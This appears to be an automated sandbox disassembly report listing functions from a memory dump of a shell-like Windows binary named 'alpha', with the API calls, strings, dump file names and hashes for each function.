                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: CloseOpenQueryValue
                                      • String ID: Software\Microsoft\Windows NT\CurrentVersion$UBR
                                      • API String ID: 3677997916-3870813718
                                      • Opcode ID: e374f3dcbd9129e05b114749def04da8ffc7e52e41f89dc762ae3dbe31e9aca9
                                      • Instruction ID: 4047ecb8fefeff54818d780c4ee81cdc8aa44fba7473b608d3c8b2fa863da3d2
                                      • Opcode Fuzzy Hash: e374f3dcbd9129e05b114749def04da8ffc7e52e41f89dc762ae3dbe31e9aca9
                                      • Instruction Fuzzy Hash: 85113DBB618A8287EB109B10F44426AFB64FB85B68F844131DB8D46768DF7CC048CB50
                                      Function 00007FF755CA4C18 Relevance: 7.7, APIs: 5, Instructions: 164COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: memsetwcsrchr$wcschr
                                      • String ID:
                                      • API String ID: 110935159-0
                                      • Opcode ID: b345b7c45728a808ede4069a13096384997743dec9cf79993fccb4cd8bca3deb
                                      • Instruction ID: c182fcdabe4aec69cb4f6b1ab81df1110273845bb065f8ef6182ececc411629b
                                      • Opcode Fuzzy Hash: b345b7c45728a808ede4069a13096384997743dec9cf79993fccb4cd8bca3deb
                                      • Instruction Fuzzy Hash: C551B5A7B0978386FA61AB51D8447F9E790BB49FACF8C4630CE5E4B784DE3CE5418210
                                      Function 00007FF755CB5EE4 Relevance: 7.6, APIs: 5, Instructions: 146COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: memset$CurrentDirectorytowupper
                                      • String ID:
                                      • API String ID: 1403193329-0
                                      • Opcode ID: 5fd9396427832dd309ea45de15a329022afb5af3b1e2a9a89c5af6baa20d3923
                                      • Instruction ID: b68540a24c14c419329bc0e538e1534017e8ebb1e9651a8e135dc8fe28fd25ea
                                      • Opcode Fuzzy Hash: 5fd9396427832dd309ea45de15a329022afb5af3b1e2a9a89c5af6baa20d3923
                                      • Instruction Fuzzy Hash: 3251946BA0568385EB65AF21D9406BAB7A0EF48F6CFC98135DA4D07794EF3C9944C320
                                      Function 00007FF755CA91C0 Relevance: 7.6, APIs: 5, Instructions: 138COMMON
                                      Download Yara Rule
                                      APIs
                                      • memset.MSVCRT ref: 00007FF755CA921C
                                      • ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF755CA93AA
                                        • Part of subcall function 00007FF755CA8B20: wcsrchr.MSVCRT ref: 00007FF755CA8BAB
                                        • Part of subcall function 00007FF755CA8B20: _wcsicmp.MSVCRT ref: 00007FF755CA8BD4
                                        • Part of subcall function 00007FF755CA8B20: _wcsicmp.MSVCRT ref: 00007FF755CA8BF2
                                        • Part of subcall function 00007FF755CA8B20: GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF755CA8C16
                                        • Part of subcall function 00007FF755CA8B20: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF755CA8C2F
                                        • Part of subcall function 00007FF755CA8B20: wcschr.MSVCRT ref: 00007FF755CA8CB3
                                        • Part of subcall function 00007FF755CB417C: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF755CB41AD
                                        • Part of subcall function 00007FF755CB3060: SetErrorMode.KERNELBASE(00000000,00000000,0000000A,00007FF755CA92AC), ref: 00007FF755CB30CA
                                        • Part of subcall function 00007FF755CB3060: SetErrorMode.KERNELBASE ref: 00007FF755CB30DD
                                        • Part of subcall function 00007FF755CB3060: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF755CB30F6
                                        • Part of subcall function 00007FF755CB3060: SetErrorMode.KERNELBASE ref: 00007FF755CB3106
                                      • wcsrchr.MSVCRT ref: 00007FF755CA92D8
                                      • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF755CA9362
                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF755CA9373
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: Error$Mode$AttributesFileLast_wcsicmpmemsetwcsrchr$CurrentDirectoryFullNamePathwcschr
                                      • String ID:
                                      • API String ID: 3966000956-0
                                      • Opcode ID: 51d36840c515d6297a634993eddc42ebf602c1e6363eff28c9f7b85ed9b18e6d
                                      • Instruction ID: 878c630718ce78996cda87a868388e6969694826a4db85f7d0b83b7ac45be465
                                      • Opcode Fuzzy Hash: 51d36840c515d6297a634993eddc42ebf602c1e6363eff28c9f7b85ed9b18e6d
                                      • Instruction Fuzzy Hash: 3251B07BA0A68386EB61AF21D8512BDA7A0FB49F9CF885435CA4D0B794DF3CE551C310
                                      Function 00007FF755CA2A30 Relevance: 7.6, APIs: 5, Instructions: 119COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: memset$_setjmp
                                      • String ID:
                                      • API String ID: 3883041866-0
                                      • Opcode ID: e33d06249403871d6f9610438f4bfbc3f30fdab118e84afd621e3dd41ff84285
                                      • Instruction ID: 8dc537b3aeee08a3f130816f35646e9930f2fee496217d54ab0de73bb6021bba
                                      • Opcode Fuzzy Hash: e33d06249403871d6f9610438f4bfbc3f30fdab118e84afd621e3dd41ff84285
                                      • Instruction Fuzzy Hash: 77515FB7608B868AEB61DF21D8503E9B7A4FB49B48F884135DA4D87B48DF3CD645CB10
                                      Function 00007FF755CAB49C Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 106COMMON
                                      Download Yara Rule
                                      APIs
                                      • _wcsicmp.MSVCRT ref: 00007FF755CAB4BD
                                        • Part of subcall function 00007FF755CB06C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF755CAB4DB), ref: 00007FF755CB06D6
                                        • Part of subcall function 00007FF755CB06C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF755CAB4DB), ref: 00007FF755CB06F0
                                        • Part of subcall function 00007FF755CB06C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF755CAB4DB), ref: 00007FF755CB074D
                                        • Part of subcall function 00007FF755CB06C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF755CAB4DB), ref: 00007FF755CB0762
                                      • _wcsicmp.MSVCRT ref: 00007FF755CAB518
                                      • _wcsicmp.MSVCRT ref: 00007FF755CAB58B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: Heap$_wcsicmp$AllocProcess
                                      • String ID: ELSE$IF/?
                                      • API String ID: 3223794493-1134991328
                                      • Opcode ID: 423616b0ad94ea500b20ba8b377132b2965d659a86947a17f8aec48fbfe776c9
                                      • Instruction ID: 370459b13d7883b14f47487c5112f17cb39905d57d06dd420c6714ab9c516ce5
                                      • Opcode Fuzzy Hash: 423616b0ad94ea500b20ba8b377132b2965d659a86947a17f8aec48fbfe776c9
                                      • Instruction Fuzzy Hash: 22413CBBE0964381FB55BB64E4652B9AA91AF84F4CFCC9839D54E47291DF3CE8018370
                                      Function 00007FF755CCE3E8 Relevance: 7.6, APIs: 5, Instructions: 105fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: memset$File_get_osfhandle$PointerReadlongjmp
                                      • String ID:
                                      • API String ID: 1532185241-0
                                      • Opcode ID: 771aa78906e2d4e00bf09d1751668696db7999ff0f41d10bb5d7c13c5b4464d7
                                      • Instruction ID: 482becd2401ff8b49f4dd9e92ff29ae8fe4a5d1c4f13d709e3115329c8dbf995
                                      • Opcode Fuzzy Hash: 771aa78906e2d4e00bf09d1751668696db7999ff0f41d10bb5d7c13c5b4464d7
                                      • Instruction Fuzzy Hash: 844103BBA0478387E751AB20D44557DFBA1FB8AF84F885535EA1A43B81CF3CE8018B10
                                      Function 00007FF755CA4FE8 Relevance: 7.6, APIs: 5, Instructions: 102fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: ErrorFileLast$DeleteRead_get_osfhandle
                                      • String ID:
                                      • API String ID: 3588551418-0
                                      • Opcode ID: 7b3e9ef8f9e00def7e0f555f85ef5a51875302e682b222ee2a1690b22849d021
                                      • Instruction ID: 0a6e0337adc5e8c5599b25f8a25eba21ddee29ddecfb03f08c13dc4f1eb9a844
                                      • Opcode Fuzzy Hash: 7b3e9ef8f9e00def7e0f555f85ef5a51875302e682b222ee2a1690b22849d021
                                      • Instruction Fuzzy Hash: EC41B0BBA086438BE714AB51E44027DFA61EF85F88F9C9439D64E47791CE7CE840C760
                                      Function 00007FF755CCE558 Relevance: 7.6, APIs: 5, Instructions: 100COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: ErrorModememset$FullNamePath_wcsicmp
                                      • String ID:
                                      • API String ID: 2123716050-0
                                      • Opcode ID: 33d1f1addd1234cebd96803971f963ad7e2cc1408ae37093ec207d02c7820e71
                                      • Instruction ID: 04b3b597061562ad7b4ab6146dd41a22fd8cedd502d51611de6a3727b0be1edf
                                      • Opcode Fuzzy Hash: 33d1f1addd1234cebd96803971f963ad7e2cc1408ae37093ec207d02c7820e71
                                      • Instruction Fuzzy Hash: F3419377705BC68AEB72AF21D8503E9A794EB49B4CF884134DA4D4AA98DF3CD6448710
                                      Function 00007FF755CA65F8 Relevance: 7.6, APIs: 5, Instructions: 96COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: Console$Window_get_osfhandle$InitializeModeUninitializememset
                                      • String ID:
                                      • API String ID: 3114114779-0
                                      • Opcode ID: dd13b5c20e564fbc5da2777ccedce70a1d97cd9fadfc38a69240d2783957a71e
                                      • Instruction ID: 2773c181e66617920dfc2d386a48490eeb5d9210236cc699a9e4743cbec318d3
                                      • Opcode Fuzzy Hash: dd13b5c20e564fbc5da2777ccedce70a1d97cd9fadfc38a69240d2783957a71e
                                      • Instruction Fuzzy Hash: A141277BA09A428AE700AF65D4402ACBBB5FB88B48F994035DA0D93B54DF38D446C760
                                      Function 00007FF755CCA73C Relevance: 7.6, APIs: 5, Instructions: 84registryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF755CC9A82), ref: 00007FF755CCA77A
                                      • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF755CC9A82), ref: 00007FF755CCA7AF
                                      • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF755CC9A82), ref: 00007FF755CCA80E
                                      • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF755CC9A82), ref: 00007FF755CCA839
                                      • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF755CC9A82), ref: 00007FF755CCA850
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: QueryValue$CloseErrorLastOpen
                                      • String ID:
                                      • API String ID: 2240656346-0
                                      • Opcode ID: 259df60cb868630656fe61ae38790f52a7232b22d9cc8ec1dbee3975f468035b
                                      • Instruction ID: 83201213402254ec95efb91a2731233e58637748bfb1e2916b3d7ab42a5d0297
                                      • Opcode Fuzzy Hash: 259df60cb868630656fe61ae38790f52a7232b22d9cc8ec1dbee3975f468035b
                                      • Instruction Fuzzy Hash: 4931A07BA28A8287E750AF24E844479F7A5FB88F94F985030EA5E42B54DF3CD841CB10
                                      Function 00007FF755CCD0C0 Relevance: 7.6, APIs: 5, Instructions: 64COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00007FF755CB01B8: _get_osfhandle.MSVCRT ref: 00007FF755CB01C4
                                        • Part of subcall function 00007FF755CB01B8: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF755CBE904,?,?,?,?,00000000,00007FF755CB3491,?,?,?,00007FF755CC4420), ref: 00007FF755CB01D6
                                      • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF755CCD0F9
                                      • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0 ref: 00007FF755CCD10F
                                      • ScrollConsoleScreenBufferW.API-MS-WIN-CORE-CONSOLE-L2-1-0 ref: 00007FF755CCD166
                                      • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF755CCD17A
                                      • SetConsoleCursorPosition.API-MS-WIN-CORE-CONSOLE-L2-1-0 ref: 00007FF755CCD18C
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: Console$BufferHandleScreen$CursorFileInfoPositionScrollType_get_osfhandle
                                      • String ID:
                                      • API String ID: 3008996577-0
                                      • Opcode ID: cebe966d7df5a2bd0607568b5e1b41817dd61a68bafb8258f014fa92f4b8adc0
                                      • Instruction ID: 64dcaa90d0b989fc5be6b187dcbf2f037dbae7e42dd90babaeb74a9f3b209084
                                      • Opcode Fuzzy Hash: cebe966d7df5a2bd0607568b5e1b41817dd61a68bafb8258f014fa92f4b8adc0
                                      • Instruction Fuzzy Hash: 1B213C6AB14692CAE740AB71E8400BDB7B0FB4DF59B885125DE1D93B58EF38D041CB24
                                      Function 00007FF755CC5770 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 169COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: CreateSemaphore
                                      • String ID: _p0$wil
                                      • API String ID: 1078844751-1814513734
                                      • Opcode ID: f755fc07889d6bdabc5bc906762bcb13605c747dc28133a8421b38486d33263f
                                      • Instruction ID: b799e36d2a2b53f4db845658fbff8eb59fb9a8db45d3c61547d7cc2acf43825d
                                      • Opcode Fuzzy Hash: f755fc07889d6bdabc5bc906762bcb13605c747dc28133a8421b38486d33263f
                                      • Instruction Fuzzy Hash: 5D51E3EBB1968386EE61EF1484582B9E2A0EF84F98FDC5435DA1D4B780DE3CE4058760
                                      Function 00007FF755CCB89C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 104memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • RtlCreateUnicodeStringFromAsciiz.NTDLL ref: 00007FF755CCB934
                                      • GlobalAlloc.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF755CB5085), ref: 00007FF755CCB9A5
                                      • GlobalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF755CB5085), ref: 00007FF755CCB9F7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: Global$AllocAsciizCreateFreeFromStringUnicode
                                      • String ID: %WINDOWS_COPYRIGHT%
                                      • API String ID: 1103618819-1745581171
                                      • Opcode ID: 16d2b5de7a39f60598d54afa282db4830b4e4e1db5eb0a36e09c541776fa7494
                                      • Instruction ID: 2dfc90948bbbb489d294afe3ee1919b29830ee19f295482ea2a748cc03bdd18f
                                      • Opcode Fuzzy Hash: 16d2b5de7a39f60598d54afa282db4830b4e4e1db5eb0a36e09c541776fa7494
                                      • Instruction Fuzzy Hash: 5B41A2BBA08B8382EA50AF559410279B3B0FB49F98FC95231DA9D47395EF3CE481C750
                                      Function 00007FF755CD0774 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 86COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
